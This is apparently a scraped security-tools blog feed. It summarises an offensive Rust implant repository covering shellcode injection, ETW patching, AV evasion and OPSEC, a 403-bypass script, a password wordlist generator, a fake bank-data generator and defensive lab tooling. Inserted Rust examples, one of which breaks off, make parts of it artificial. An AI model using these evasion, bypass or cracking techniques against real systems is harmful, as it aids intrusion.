Today, 29 November 2021 - KitPloit - PenTest & Hacking Tools

OffensiveRust - Rust Weaponization For Red Team Engagements

29 November 2021 at 11:30
By: Zion3R


My experiments in weaponizing Rust for implant development and general offensive operations.


Why Rust?

  • It is faster than languages like C/C++
  • It is a multi-purpose language with excellent communities
  • It has an amazing built-in dependency and build manager called Cargo
  • It is LLVM based, which makes it a very good candidate for bypassing static AV detection
  • Super easy cross-compilation to Windows from *nix/macOS: it only requires installing the mingw toolchain, although certain libraries cannot be compiled successfully on other OSes.

Examples in this repo

  • Allocate_With_Syscalls: Uses NTDLL functions directly via the ntapi library
  • Create_DLL: Creates a DLL and pops up a msgbox; Rust does not fully support this, so things might get weird since Rust DLLs do not have a main function
  • DeviceIoControl: Opens a driver handle and executes DeviceIoControl
  • EnableDebugPrivileges: Enables SeDebugPrivilege in the current process
  • Shellcode_Local_inject: Executes shellcode directly in the local process by casting a pointer
  • Execute_With_CMD: Executes cmd by passing a command via Rust
  • ImportedFunctionCall: Imports minidump from dbghelp and executes it
  • Kernel_Driver_Exploit: Kernel driver exploit for a simple buffer overflow
  • Named_Pipe_Client: Named pipe client
  • Named_Pipe_Server: Named pipe server
  • Process_Injection_CreateThread: Process injection into a remote process with CreateRemoteThread
  • Unhooking: Unhooking calls
  • asm_syscall: Obtaining the PEB address via asm
  • base64_system_enum: Base64 encoding/decoding of strings
  • http-https-requests: HTTP/S GET/POST requests that ignore the certificate check
  • patch_etw: Patch ETW
  • ppid_spoof: Spoof the parent process of a created process
  • tcp_ssl_client: TCP client with SSL that ignores the certificate check (requires OpenSSL and Perl to be installed for compiling)
  • tcp_ssl_server: TCP server with a port parameter (requires OpenSSL and Perl to be installed for compiling)
  • wmi_execute: Executes a WMI query to obtain the AV/EDRs on the host
  • Windows.h+ Bindings: This file contains the structures of Windows.h plus complete customized LDR, PEB, etc. that are officially undocumented by Microsoft; add include!("../bindings.rs"); at the top of your file
  • UUID_Shellcode_Execution: Plants shellcode from a UUID array into heap space and uses the EnumSystemLocalesA callback in order to execute the shellcode

Compiling the examples in this repo

This repository does not provide binaries; you're gonna have to compile them yourself.

Install Rust
Simply download the binary and install.

This repo was compiled on Windows 10, so I would stick to it. As mentioned, the OpenSSL examples will have dependency issues that require OpenSSL and Perl to be installed. For the TCP SSL client/server I recommend a static build because of the dependencies on the hosts where you will execute the binaries. To create a project, execute:
cargo new <name>

This will automatically create the structured project folders with:

project
├── Cargo.toml
└── src
    └── main.rs

Cargo.toml is the file that contains the dependencies and the configuration for the compilation. main.rs is the main file that will be compiled along with any potential directories that contain libraries.

For compiling the project, go into the project directory and execute:
cargo build

This will use your default toolchain. If you want to build the final "release" version execute:
cargo build --release

For static binaries, in terminal before the build command execute:
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"
set RUSTFLAGS=-C target-feature=+crt-static

If my code is not easy for you to read the way it is written, you can also use the command below inside the project directory to format it in a better way:
cargo fmt

Certain examples might not compile and give you an error, since they might require a nightly build of Rust with the latest features. To install it, just do:
rustup default nightly

The easiest place to find the dependencies or Crates as they are called.

Cross Compiling

Cross-compiling requires following the instructions here. By installing different toolchains, you can cross-compile with the command below:
cargo build --target <toolchain>

To see the installed toolchains on your system do:
rustup toolchain list

For checking all the available targets you can install on your system (rustup calls the compilation targets "targets", as the command shows) do:
rustup target list

For installing a new target do:
rustup target add <toolchain_name>

Optimizing executables for size

This repo contains a lot of configuration options and ideas about reducing the file size. Static binaries are usually quite big.

Pitfalls I found myself falling into

Be careful of \0 bytes: do not forget them for strings in memory. I spent a lot of my time on this, but WinDbg always helped resolve it.

Interesting Rust libraries

  • WINAPI
  • WINAPI2
  • Windows - This is the official Microsoft one that I have not played much with

OPSEC

  • Even though Rust has good advantages, it is quite difficult to get used to and it ain't very intuitive.
  • Shellcode generation is another issue due to LLVM. I have found a few ways to approach this.
    Donut sometimes does generate shellcode that works, but depending on how the project is made, it might not.
    In general, for shellcode generation the tools should be made to host all code in the .text segment, which leads to this amazing repo. There is a shellcode sample in this project that can show you how to structure your code for successful shellcode generation.
    In addition, this project also has a shellcode generator that grabs the .text segment of a binary and dumps the shellcode after executing some patches.
    This project grabs the binary from a specific location, so I made a fork that receives the path of the binary as an argument here.
  • Even if you remove all debug symbols, Rust can still keep references to your home directory in the binary. The only way I've found to remove this is to pass the following flag: --remap-path-prefix {your home directory}={some random identifier}. You can use bash variables to get your home directory and generate a random placeholder: --remap-path-prefix "$HOME"="$RANDOM". (By Yamakadi)
  • Alternatively, there is another way to remove information about the home directory: add the following at the top of Cargo.toml:
    cargo-features = ["strip"]
  • Since Rust by default leaves a lot of things as strings in the binary, I mostly use this cargo.toml to avoid them and also reduce the size, with the build command:
    cargo build --release -Z build-std=std,panic_abort -Z build-std-features=panic_immediate_abort --target x86_64-pc-windows-msvc
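A check for the home-directory and source-path strings the OPSEC notes above describe. This is an added example, not code from the OffensiveRust repository: it scans a binary image for a list of path prefixes (the DEFAULT_NEEDLES list is an assumption you extend with your own build host's paths) and reports the whole embedded string around every hit, so you can confirm that --remap-path-prefix or strip actually removed them before a binary leaves the build machine.

```rust
use std::{env, fs};

/// Scan a binary image for embedded strings containing any of `needles`
/// (e.g. "/home/", "C:\\Users\\") and return each full printable run once.
pub fn find_path_leaks(binary: &[u8], needles: &[&str]) -> Vec<String> {
    let printable = |b: u8| (0x20u8..0x7f).contains(&b);
    let mut found: Vec<String> = Vec::new();
    for needle in needles {
        let nb = needle.as_bytes();
        if nb.is_empty() || nb.len() > binary.len() {
            continue;
        }
        for (i, window) in binary.windows(nb.len()).enumerate() {
            if window != nb {
                continue;
            }
            // Widen the hit to the whole printable run around it: that run is the
            // complete string the compiler embedded (a source path, a panic location, ...).
            let start = (0..i)
                .rev()
                .take_while(|&k| printable(binary[k]))
                .last()
                .unwrap_or(i);
            let end = (i..binary.len())
                .take_while(|&k| printable(binary[k]))
                .last()
                .map_or(i, |k| k + 1);
            let s = String::from_utf8_lossy(&binary[start..end]).into_owned();
            if !found.contains(&s) {
                found.push(s);
            }
        }
    }
    found
}

/// Prefixes worth looking for (assumed list; add your own home directory or project root).
pub const DEFAULT_NEEDLES: &[&str] = &["/home/", "/Users/", "C:\\Users\\", ".cargo", "rustc/"];

/// Constructed sample "binary": two embedded build paths between NUL-separated junk.
pub fn sample_binary() -> Vec<u8> {
    b"\x00\x00/home/alice/implant/src/main.rs\x00junk\x00C:\\Users\\bob\\.cargo\\registry\x00".to_vec()
}

fn main() {
    // Usage: pass a file path to scan a real binary; without one the constructed sample is scanned.
    let data = match env::args().nth(1) {
        Some(path) => fs::read(&path).expect("cannot read file"),
        None => sample_binary(),
    };
    let leaks = find_path_leaks(&data, DEFAULT_NEEDLES);
    if leaks.is_empty() {
        println!("no build-path strings found");
    }
    for leak in &leaks {
        println!("leak: {}", leak);
    }
}
```

Run it against the release binary after building with the remap flag and again without it; the difference in output is the quickest way to see whether the flag reached rustc (Cargo only forwards it when it is in RUSTFLAGS or a .cargo/config.toml).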

Other projects I have made in Rust

Projects in Rust that can be helpful

  • houdini - Helps make your executable self-delete


Yesterday, 28 November 2021 - KitPloit - PenTest & Hacking Tools

DetectionLabELK - A Fork From DetectionLab With ELK Stack Instead Of Splunk

28 November 2021 at 20:30
By: Zion3R


DetectionLabELK is a fork from Chris Long's DetectionLab with ELK stack instead of Splunk.


Description:

DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blue teams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.

Use cases:

A popular use case for DetectionLabELK is when you consider adopting the MITRE ATT&CK framework and would like to develop detections for its tactics. You can use DetectionLabELK to quickly run atomic tests, see what logs are being generated and compare them to your production environment. This way you can:

  • Validate that your production logging is working as expected.
  • Ensure that your SIEM is collecting the correct events.
  • Enhance alerts quality by reducing false positives and eliminating false negatives.
  • Minimize coverage gaps.

Lab Information:

Primary Lab Features:

  • Microsoft Advanced Threat Analytics is installed on the WEF machine, with the lightweight ATA gateway installed on the DC
  • Windows Event Forwarder along with Winlogbeat are pre-installed and all indexes are pre-created on ELK. Technology add-ons for Windows are also preconfigured.
  • A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
  • Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
  • Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs
  • osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
  • Sysmon is installed and configured using Olaf's open-sourced configuration
  • All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
  • SMBv1 Auditing is enabled

Lab Hosts:

  1. DC - Windows 2016 Domain Controller

    • WEF Server Configuration GPO
    • Powershell logging GPO
    • Enhanced Windows Auditing policy GPO
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards Sysmon & osquery)
    • Sysinternals Tools
    • Microsoft Advanced Threat Analytics Lightweight Gateway
  2. WEF - Windows 2016 Server

    • Microsoft Advanced Threat Analytics
    • Windows Event Collector
    • Windows Event Subscription Creation
    • Powershell transcription logging share
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards WinEventLog & Powershell & Sysmon & osquery)
    • Sysinternals tools
  3. Win10 - Windows 10 Workstation

    • Simulates employee workstation
    • Sysmon
    • osquery
    • Sysinternals Tools
  4. Logger - Ubuntu 18.04

    • Kibana
    • Fleet osquery Manager
    • Bro
    • Suricata
    • Elastic Beats Forwarder (Forwards Bro logs & Suricata & osquery)
    • Guacamole
    • Velociraptor

Requirements

  • 55GB+ of free disk space
  • 16GB+ of RAM
  • Vagrant 2.2.2 or newer
  • Virtualbox

Deployment Options

  1. Use Vagrant Cloud Boxes - ETA ~2 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install the Vagrant-Reload plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK/Vagrant" and execute vagrant up.
  2. Build Boxes From Scratch - ETA ~5 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install "Vagrant-Reload" plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK" base directory and build the lab by executing ./build.sh virtualbox (Mac & Linux) or ./build.ps1 virtualbox (Windows).

Troubleshooting:

  • To verify that the build process completed successfully, ensure you are in the DetectionLabELK/Vagrant directory and run vagrant status. The four machines (wef, dc, logger and win10) should be running. If one of the machines is not running, execute vagrant reload <host>. If you would like to pause the whole lab, execute vagrant suspend and resume it using vagrant resume.
  • Deployment logs will be present in the Vagrant folder as vagrant_up_<host>.log

Lab Access:

Support: If you face any problem, please open a new issue and provide relevant log file.



4-ZERO-3 - 403/401 Bypass Methods + Bash Automation

28 November 2021 at 11:30
By: Zion3R


>_ Introduction

4-ZERO-3 is a tool to bypass 403/401. This script contains all the possible techniques to do so.

  • NOTE: If you see multiple [200 OK]/bypasses as output, you must check the Content-Length. If the Content-Length is the same for multiple [200 OK]/bypasses, it means a false positive. The reason can be a "301/302" or a "../" [Payload]. DON'T PANIC.
  • The script will print the cURL PAYLOAD if a possible bypass is found.

>_ Preview



>_ Help

$ bash 403-bypass.sh -h




>_ Usage / Modes

  • Scan with specific payloads:
    • [ --header ] Support HEADER based bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --header
    • [ --protocol ] Support PROTOCOL based bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --protocol
    • [ --port ] Support PORT based bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --port
    • [ --HTTPmethod ] Support HTTP Method based bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --HTTPmethod
    • [ --encode ] Support URL Encoded bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --encode
    • [ --SQLi ] Support MySQL mod_Security & libinjection bypasses/payloads [** New **]
      $ bash 403-bypass.sh -u https://target.com/secret --SQLi
  • Complete scan {includes all exploits/payloads} for an endpoint [ --exploit ]
    $ bash 403-bypass.sh -u https://target.com/secret --exploit

Prerequisites

  • apt install curl [Debian]


Before yesterday - KitPloit - PenTest & Hacking Tools

Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool

27 November 2021 at 20:30
By: Zion3R

Cracken is a fast password wordlist generator, Smartlist creation and password hybrid-mask analysis tool written in pure safe Rust (more on talk/). Inspired by great tools like maskprocessor, hashcat, Crunch and HuggingFace's tokenizers.

What? Why? Woot??

At DeepSec2021 we presented a new method for analysing passwords as Hybrid-Masks exploiting common substrings in passwords by utilizing NLP tokenizers (more info on talk/).

Our method splits a password into its subwords instead of just a character mask. HelloWorld123! is split into ['Hello', 'World', '123!'], as these three subwords are very common in other passwords.

Hybrid Masks & Smartlists

  • Smartlists - Compact & representative subword lists created from passwords by utilizing NLP tokenizers
  • Hybrid-Mask - A representation of a password as a combination of wordlists & characters (e.g. ?w1?w2?l?d)

Analyzing RockYou Passwords with Smartlists & Hybrid-Masks:

full table here

Cracken is used for:

  • Generating Hybrid-Masks very VERY FAST (see performance section)
  • Building Smartlists - a compact & representative list of subwords from given password files (using HuggingFace's tokenizers)
  • Analyzing passwords for their Hybrid-Masks - building statistics for better password candidates (again very fast)

Possible workflows with Cracken:

Simple:

  1. Generate wordlist candidates from a hybrid mask - e.g. cracken -w rockyou.txt -w 100-most-common.txt '?w1?w2?d?d?d?d?s'
  2. You can pipe the passwords Cracken generates into hashcat, john or your favorite password cracker

Advanced:

  1. Create a Smartlist from existing passwords - cracken create
  2. Analyze a passwords list of plaintext passwords - cracken entropy
  3. use most frequent Hybrid-Masks to generate password candidates fast - cracken generate -i hybrid-masks.txt

For more details see Usage section

Getting Started

download (linux only currently): latest release

for more installation options see installation section

run Cracken:

generate all words of length 8 starting with uppercase followed by 6 lowercase chars and then a digit:

$ cracken -o pwdz.lst '?u?l?l?l?l?l?l?d'

generate words from two wordlists with year suffix (1000-2999) <firstname><lastname><year>

$ cracken --wordlist firstnames.txt --wordlist lastnames.lst --charset '12' '?w1?w2?1?d?d?d'

create a Smartlist of size 50k from subwords extracted from rockyou.txt

$ cracken create -f rockyou.txt -m 50000 --smartlist smart.lst

estimate the entropy of hybrid mask of the password HelloWorld123! using a smartlist

$ cracken entropy -f smart.lst 'HelloWorld123!'

hybrid-min-split: ["hello", "world1", "2", "3", "!"]
hybrid-mask: ?w1?w1?d?d?s
hybrid-min-entropy: 42.73
--
charset-mask: ?l?l?l?l?l?l?l?l?l?l?d?d?d?s
charset-mask-entropy: 61.97

Performance

As of writing this, Cracken is probably the world's fastest wordlist generator:



Cracken has around 25% higher performance than hashcat's fast maskprocessor, which is written in C.

Cracken can generate around 2 GB/s per core.

more details on benchmarks/

Why is speed important? A typical GPU can test billions of passwords per second, depending on the password hash function. When the wordlist generator produces fewer words per second than the cracking tool can handle, the cracking speed degrades.

Hybrid-Masks Analysis Performance

Cracken uses the A* algorithm to analyze passwords very fast. It can find the minimal Hybrid-Mask of a passwords file at a rate of ~100k passwords/sec (cracken entropy -f words1.txt -f words2.txt ... -p pwds.txt).
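The hybrid-mask analysis described above (a password cut into smartlist subwords and single charset characters, scored as log2 of the keyspace, with the cheapest cut found by A*) can be reproduced in a few dozen lines. The following is an added example and not Cracken's code: it finds the minimal split by dynamic programming over cut positions, which yields the same shortest path as A* does on this acyclic split graph, and prints the same three fields as the cracken entropy output shown earlier (hybrid-min-split, hybrid-mask and the charset-mask baseline). The three-word smartlist is constructed for the demo, only one wordlist (?w1) is modelled, and the ?s charset is the 33-character symbol list from the page's help text, so the absolute bit counts differ slightly from Cracken's own numbers.

```rust
use std::collections::HashSet;

/// Built-in charsets with the tokens Cracken's help text uses (?d ?l ?u ?s).
const CHARSETS: &[(&str, &str)] = &[
    ("?d", "0123456789"),
    ("?l", "abcdefghijklmnopqrstuvwxyz"),
    ("?u", "ABCDEFGHIJKLMNOPQRSTUVWXYZ"),
    ("?s", " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"),
];

/// One analysis result: the parts the password was cut into, the mask, and log2(keyspace).
#[derive(Debug, Clone, PartialEq)]
pub struct Split {
    pub parts: Vec<String>,
    pub mask: String,
    pub entropy: f64,
}

/// Cheapest known way to cover a prefix: (bits so far, previous cut, mask token, text of the part).
type State = Option<(f64, usize, &'static str, String)>;

/// Token and cost (log2 of charset size) of the first built-in charset containing `c`.
fn charset_for(c: char) -> Option<(&'static str, f64)> {
    CHARSETS
        .iter()
        .find(|(_, chars)| chars.contains(c))
        .map(|(tok, chars)| (*tok, (chars.chars().count() as f64).log2()))
}

/// Plain charset mask (?u?l?l...): the baseline Cracken prints as charset-mask.
pub fn charset_mask(password: &str) -> Option<Split> {
    let mut out = Split { parts: Vec::new(), mask: String::new(), entropy: 0.0 };
    for c in password.chars() {
        let (tok, bits) = charset_for(c)?;
        out.parts.push(c.to_string());
        out.mask.push_str(tok);
        out.entropy += bits;
    }
    Some(out)
}

/// Keep the cheaper of the existing state and the candidate for position `j`.
fn relax(best: &mut [State], j: usize, bits: f64, prev: usize, tok: &'static str, text: String) {
    if best[j].as_ref().map_or(true, |b| bits < b.0) {
        best[j] = Some((bits, prev, tok, text));
    }
}

/// Minimal-entropy hybrid split. Cracken searches with A*; here the same shortest path is
/// found by dynamic programming over cut positions. A smartlist subword costs
/// log2(smartlist size); a lone character costs log2(its charset size).
pub fn min_hybrid_split(password: &str, smartlist: &[&str]) -> Option<Split> {
    let pw: Vec<char> = password.chars().collect();
    let n = pw.len();
    let vocab: HashSet<String> = smartlist.iter().map(|w| w.to_lowercase()).collect();
    let max_word = vocab.iter().map(|w| w.chars().count()).max().unwrap_or(0);
    let word_bits = (vocab.len() as f64).log2();
    let mut best: Vec<State> = vec![None; n + 1];
    best[0] = Some((0.0, 0, "", String::new()));
    for i in 0..n {
        let bits_i = match &best[i] {
            Some(b) => b.0,
            None => continue, // prefix pw[..i] cannot be covered at all
        };
        // Edge 1: consume one character through its charset.
        if let Some((tok, bits)) = charset_for(pw[i]) {
            relax(&mut best, i + 1, bits_i + bits, i, tok, pw[i].to_string());
        }
        // Edge 2: consume a subword that is in the smartlist (matched case-insensitively).
        for j in i + 1..=(i + max_word).min(n) {
            let sub: String = pw[i..j].iter().collect();
            if vocab.contains(&sub.to_lowercase()) {
                relax(&mut best, j, bits_i + word_bits, i, "?w1", sub);
            }
        }
    }
    let entropy = best[n].as_ref()?.0;
    // Walk the back-pointers from the end to recover the parts and the mask.
    let (mut parts, mut tokens, mut i) = (Vec::new(), Vec::new(), n);
    while i > 0 {
        let (_, prev, tok, text) = best[i].clone()?;
        parts.push(text);
        tokens.push(tok);
        i = prev;
    }
    parts.reverse();
    tokens.reverse();
    Some(Split { parts, mask: tokens.concat(), entropy })
}

fn main() {
    // Constructed three-word smartlist; a real one from `cracken create` has tens of thousands of subwords.
    let smartlist = ["hello", "world", "123"];
    let pw = "HelloWorld123!";
    if let (Some(h), Some(c)) = (min_hybrid_split(pw, &smartlist), charset_mask(pw)) {
        println!("hybrid-min-split: {:?}", h.parts);
        println!("hybrid-mask: {}  entropy: {:.2}", h.mask, h.entropy);
        println!("charset-mask: {}  entropy: {:.2}", c.mask, c.entropy);
    }
}
```

With a tiny vocabulary the subword cost is only log2(3) bits, which is why the hybrid entropy collapses to under 10 bits against 62 for the pure charset mask; with a 50k-entry smartlist each subword costs about 15.6 bits, matching the magnitude of the numbers in the cracken entropy output above. The gap between the two figures is exactly the argument of the tool: passwords built from common subwords have far less effective keyspace than their character mask suggests.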

Installation

install Cracken or compile from source

Download Binary (Linux Only Currently)

download latest release from releases

Build From Source (All Platforms)

Cracken is written in Rust and needs rustc to be compiled. Cracken should support all platforms that Rust supports.

installation instructions for cargo

There are two options for building from source: installing with cargo from crates.io (preferred) or compiling manually from source.

1. install from crates.io (preferred)

install with cargo:

$ cargo install cracken

2. build from source

clone Cracken:

$ git clone https://github.com/shmuelamar/cracken

build Cracken:

$ cd cracken
$ cargo build --release

run it:

$ ./target/release/cracken --help

Usage Info

$ cracken --help
Cracken v1.0.0 - a fast password wordlist generator

USAGE:
cracken [SUBCOMMAND]

FLAGS:
-h, --help Prints help information
-V, --version Prints version information

SUBCOMMANDS:
generate (default) - Generates newline separated words according to given mask and wordlist files
create Create a new smartlist from input file(s)
entropy
Computes the estimated entropy of password or password file.
The entropy of a password is the log2(len(keyspace)) of the password.

There are two types of keyspace size estimations:
* mask - keyspace of each char (digit=10, lowercase=26...).
* hybrid - finding minimal split into subwords and charsets.


For specific subcommand help run: cracken <subcommand> --help


Example Usage:

## Generate Subcommand Examples:

# all digits from 00000000 to 99999999
cracken ?d?d?d?d?d?d?d?d

# all digits from 0 to 99999999
cracken -m 1 ?d?d?d?d?d?d?d?d

# words with pwd prefix - pwd0000 to pwd9999
cracken pwd?d?d?d?d

# all passwords of length 8 starting with upper then 6 lowers then digit
cracken ?u?l?l?l?l?l?l?d

# same as above, write output to pwds.txt instead of stdout
cracken -o pwds.txt ?u?l?l?l?l?l?l?d

# custom charset - all hex values
cracken -c 0123456789abcdef '?1?1?1?1'

# 4 custom charsets - the order determines the id of the charset
cracken -c 01 -c ab -c de -c ef '?1?2?3?4'

# 4 lowercase chars with years 2000-2019 suffix
cracken -c 01 '?l?l?l?l20?1?d'

# starts with firstname from wordlist followed by 4 digits
cracken -w firstnames.txt '?w1?d?d?d?d'

# starts with firstname from wordlist with lastname from wordlist ending with symbol
cracken -w firstnames.txt -w lastnames.txt -c '[email protected]#$' '?w1?w2?1'

# repeating wordlists multiple times and combining charsets
cracken -w verbs.txt -w nouns.txt '?w1?w2?w1?w2?w2?d?d?d'


## Create Smartlists Subcommand Examples:

# create smartlist from single file into smart.txt
cracken create -f rockyou.txt --smartlist smart.txt

# create smartlist from multiple files with multiple tokenization algorithms
cracken create -t bpe -t unigram -t wordpiece -f rockyou.txt -f passwords.txt -f wikipedia.txt --smartlist smart.txt

# create smartlist with minimum subword length of 3 and max numbers-only subwords of size 6
cracken create -f rockyou.txt --min-word-len 3 --numbers-max-size 6 --smartlist smart.txt


## Entropy Subcommand Examples:

# estimating entropy of a password
cracken entropy --smartlist vocab.txt 'helloworld123!'

# estimating entropy of a passwords file with a charset mask entropy (default is hybrid)
cracken entropy --smartlist vocab.txt -t charset -p passwords.txt

# estimating the entropy of a passwords file
cracken entropy --smartlist vocab.txt -p passwords.txt

cracken-v1.0.0 linux-x86_64 compiler: rustc 1.56.1 (59eed8a2a 2021-11-01)
more info at: https://github.com/shmuelamar/cracken

Generate Subcommand Usage Info

$ cracken generate --help
cracken-generate
(default) - Generates newline separated words according to given mask and wordlist files

USAGE:
cracken generate [FLAGS] [OPTIONS] <mask> --masks-file <masks-file>

FLAGS:
-h, --help
Prints help information

-s, --stats
prints the number of words this command will generate and exits

-V, --version
Prints version information


OPTIONS:
-c, --custom-charset <custom-charset>...
custom charset (string of chars). up to 9 custom charsets - ?1 to ?9. use ?1 on the mask for the first charset

-i, --masks-file <masks-file>
a file containing masks to generate

-x, --maxlen <max-length>
maximum length of the mask to start from

-m, --minlen <min-length>
minimum length of the mask to start from

-o, --output-file <output-file>
output file to write the wordlist to, defaults to stdout

-w, --wordlist <wordlist>...
filename containing newline (0xA) separated words. note: currently all wordlists loaded to memory


ARGS:
<mask>
the wordlist mask to generate.
available masks are:
builtin charsets:
?d - digits: "0123456789"
?l - lowercase: "abcdefghijklmnopqrstuvwxyz"
?u - uppercase: "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
?s - symbols: " !\"\#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
?a - all characters: ?d + ?l + ?u + ?s
?b - all binary values: (0-255)

custom charsets ?1 to ?9:
?1 - first custom charset specified by --charset 'mychars'

wordlists ?w1 to ?w9:
?w1 - first wordlist specified by --wordlist 'my-wordlist.txt'

Create Smartlist Subcommand Usage Info

$ cracken create --help  
cracken-create
Create a new smartlist from input file(s)

USAGE:
cracken create [FLAGS] [OPTIONS] --file <file>... --smartlist <smartlist>

FLAGS:
-h, --help Prints help information
-q, --quiet disables printing progress bar
-V, --version Prints version information

OPTIONS:
-f, --file <file>... input filename, can be specified multiple times for multiple files
--min-frequency <min_frequency> minimum frequency of a word, relevant only for BPE tokenizer
-l, --min-word-len <min_word_len> filters words shorter than the specified length
--numbers-max-size <numbers_max_size> filters numbers (all digits) longer than the specified size
-o, --smartlist <smartlist> output smartlist filename
-t, --tokenizer <tokenizer>... tokenizer to use, can be specified multiple times.
one of: bpe,unigram,wordpiece [default: bpe] [possible values: bpe, unigram, wordpiece]
-m, --vocab-max-size <vocab_max_size> max vocabulary size

Entropy Subcommand Usage Info

$ cracken entropy --help
cracken-entropy

Computes the estimated entropy of password or password file.
The entropy of a password is the log2(len(keyspace)) of the password.

There are two types of keyspace size estimations:
* mask - keyspace of each char (digit=10, lowercase=26...).
* hybrid - finding minimal split into subwords and charsets.


USAGE:
cracken entropy [FLAGS] [OPTIONS] <password> --smartlist <smartlist>...

FLAGS:
-h, --help Prints help information
-s, --summary output summary of entropy for password
-V, --version Prints version information

OPTIONS:
-t, --mask-type <mask_type> type of mask to output, one of: charsets(charsets only), hybrid(charsets+wordlists) [possible values: hybrid, charset]
-p, --passwords-file <passwords-file> newline separated password file to estimate entropy for
-f, --smartlist <smartlist>... smartlist input file to estimate entropy with, a newline separated text file

ARGS:
<password> password to

License

Cracken is licensed under MIT. THIS PROJECT MUST BE USED FOR LEGAL PURPOSES ONLY


Contributing

Cracken is under active development; if you wish to help, below is the partial roadmap for this project. Feel free to submit PRs and open issues.



FakeDataGen - Full Valid Fake Data Generator

27 November 2021 at 11:30
By: Zion3R


FakeDataGen is a Full Valid Fake Data Generator.

This tool helps you to create fake accounts (in Spanish format) with fully valid data. Within this information, you can find the most common names, emails, bank details and other useful information.


Requirements

  • Python 3
  • Install requirements.txt

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/FakeDataGen

Usage

./FakeDataGen.py -h

_____ _ ____ _ ____
| ___|_ _| | _ ___| _ \ __ _| |_ __ _ / ___| ___ _ __
| |_ / _` | |/ / _ \ | | |/ _` | __/ _` | | _ / _ \ '_ \
| _| (_| | < __/ |_| | (_| | || (_| | |_| | __/ | | |
|_| \__,_|_|\_\___|____/ \__,_|\__\__,_|\____|\___|_| |_|

-------------------- by @JoelGMSec ---------------------

usage: FakeDataGen.py [-h] [-n NUMBER] [-b] [-e] [-f FILE] [-z] [-p PASSWORD]

optional arguments:
-h, --help show this help message and exit
-n NUMBER, --number NUMBER
The number of records should be created
-b, --bankdata Show only bank data (Card, CVV, IBAN..)
-e, --extended Show only extended info (City, Phone, SS..)
-f FILE, --file FILE File path to save data
-z, --zip Compress data to zip file
-p PASSWORD, --password PASSWORD
Password to protect zip file

The detailed guide of use can be found at the following link:

https://darkbyte.net/generando-datos-falsos-con-fakedatagen

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This script has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



ELFXtract - An Automated Analysis Tool Used For Enumerating ELF Binaries

26 November 2021 at 20:30
By: Zion3R


ELFXtract is an automated analysis tool used for enumerating ELF binaries.

Powered by Radare2 and r2ghidra.

It is specially developed for PWN challenges and has many automated features.

It displays almost every detail of the ELF and also decompiles its ASM to C code using r2ghidra.

Decompiling ELFs in Ghidra takes more time, but elfxtract decompiles and displays the result in a few seconds.


Features in ELFXtract

  1. File info
  2. Shared object dependency details
  3. ELF Security Mitigation details / Checksec
  4. String details
  5. Header memory map
  6. ROP gadgets
  7. PLT Table
  8. GOT Table
  9. Function Table
  10. ASM code of functions
  11. Decompiled code of functions
  12. Predicting possible vulnerable functions
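The ELF SECURITY MITIGATIONS block that elfxtract prints (RELRO, NX, PIE, RPATH, RUNPATH) can be derived from the ELF program headers and the dynamic table alone, which is what checksec-style tools do. The following is an added example, not elfxtract's code: a small ELF64 checker in Rust plus a constructed, header-only image to run it on (the stack-canary and stripped-symbol checks need the symbol table and are left out). The constant values are the standard ones from elf.h; to check a real binary, pass the bytes from std::fs::read to analyze.

```rust
use std::convert::TryInto;

// ELF64 constants (standard values from the System V ABI / glibc elf.h).
const ET_EXEC: u16 = 2; const ET_DYN: u16 = 3;
const PT_LOAD: u32 = 1; const PT_DYNAMIC: u32 = 2;
const PT_GNU_STACK: u32 = 0x6474_e551; const PT_GNU_RELRO: u32 = 0x6474_e552;
const PF_X: u32 = 1; const PF_W: u32 = 2; const PF_R: u32 = 4;
const DT_NULL: u64 = 0; const DT_RPATH: u64 = 15; const DT_BIND_NOW: u64 = 24; const DT_RUNPATH: u64 = 29;
const DT_FLAGS: u64 = 30; const DT_FLAGS_1: u64 = 0x6fff_fffb; const DF_BIND_NOW: u64 = 0x8; const DF_1_NOW: u64 = 0x1;

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Relro { None, Partial, Full }

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Mitigations { pub pie: bool, pub nx: bool, pub relro: Relro, pub rpath: bool, pub runpath: bool }

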